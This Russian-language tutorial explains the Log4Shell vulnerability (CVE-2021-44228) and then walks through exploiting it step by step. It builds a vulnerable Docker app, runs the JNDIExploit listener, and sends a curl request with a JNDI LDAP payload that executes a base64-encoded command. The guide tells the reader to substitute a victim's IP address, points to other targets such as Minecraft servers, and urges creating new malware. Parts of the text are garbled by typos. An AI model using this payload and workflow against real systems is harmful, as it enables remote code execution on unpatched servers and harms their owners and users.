

Обнаружена уязвимость удалённого выполнения кода, связанная с библиотекой ведения журналов Java Log4j.
CVE-2021-44228 Эта уязвимость вызвала переполох в мировом киберсообществе: со времён Wannacry мы не видели такого воздействия.
Считается, что большинство приложений, написанных на Java, затронуты и уязвимы, особенно фреймворки Apache, включая Apache Struts2, Apache Solr, Apache Druid и Apache Flink. Кроме того, уязвимы также ElasticSearch, Flume, Logstash, Kafka, Netty, MyBatis и Spring-Boot-starter-log4j. Некоторые из самых популярных продуктов и сервисов в интернете - включая Apple iCloud, Amazon, Steam и Twitter - полагаются на эти фреймворки для своей работы. Считается также, что это затрагивает значительное число корпоративных приложений и приложений в сфере кибербезопасности.
Radware (постоянно адаптивные DDoS-сервисы реального времени )заявила, что уязвимо только то ПО, которое включает и использует подстановку сообщений log4j. Начиная с версии 2.15.0, подстановка сообщений отключена по умолчанию, поэтому необходимо обновление. Версии Log4j 2 с 2.0-beta9 по 2.14.1 уязвимы и эксплуатируемы.


прежде всего, это руководство совместимо с работой на виртуальной машине kali linux и запуском java-слушателя следующей командой, как показано слева в видео-руководстве. начните со сборки docker-приложения с уязвимостью, а затем запустите его. итак, давайте сделаем это.
docker build . -t vulnerable-appследующий шаг — собственно запустить vulnerable-app, который был развёрнут.
*итак, следующая команда:
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
и теперь скрипт Spring должен запускаться, как в видео-руководстве.
теперь, чтобы получить отпечаток для LDAP-сервера, нам нужно просто создать LDAP-ссылку, и готово; сначала скачайте эксплойт-инструмент JNDIExploit-1.2. URL для загрузки JNDIExploit удалён GitHub, поэтому скачивайте из архива (URL ниже). возьмите следующий URL для загрузки из архива JNDIExploitArchiveUrl
итак, давайте сделаем это
распакуйте JNDIExploit.
запустите java-слушатель: java -jar JNDIExploit.v1.2-SNAPSHOT.jar -i "replace_with_ypure_IP-ADDR" -p 8888.
примечание: удалите "replace_with your IP-addr" и введите IP-адрес вашего слушателя. ( Не включая скобки).
следующий шаг для запуска эксплойта — выполните следующую команду:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://"ip-addr":1389/Basic/Command/Base64/aGVsbG8td29ybGQ=}'
примечание: замените "ip-addr на ваш локальный IP, который слушает java"; а также замените 127.0.0.1 на IP-адрес жертвы, и это конец: вы получите строку hello-world через base64. подобным образом вы можете выполнять любые манипуляции. обнаружено больше техник для использования, например Minecraft; можно выполнять манипуляции через инструмент Burp Suite для открытых сервисов на компьютере и т. д. Представьте это - войдите в продуктивный режим, повысьте свою импровизацию и создайте следующее вредоносное ПО.
можно заменить строку base64 (hello-world) на исполняемый JS-код, совместимый с выполнением запросов через LDAP-сервер.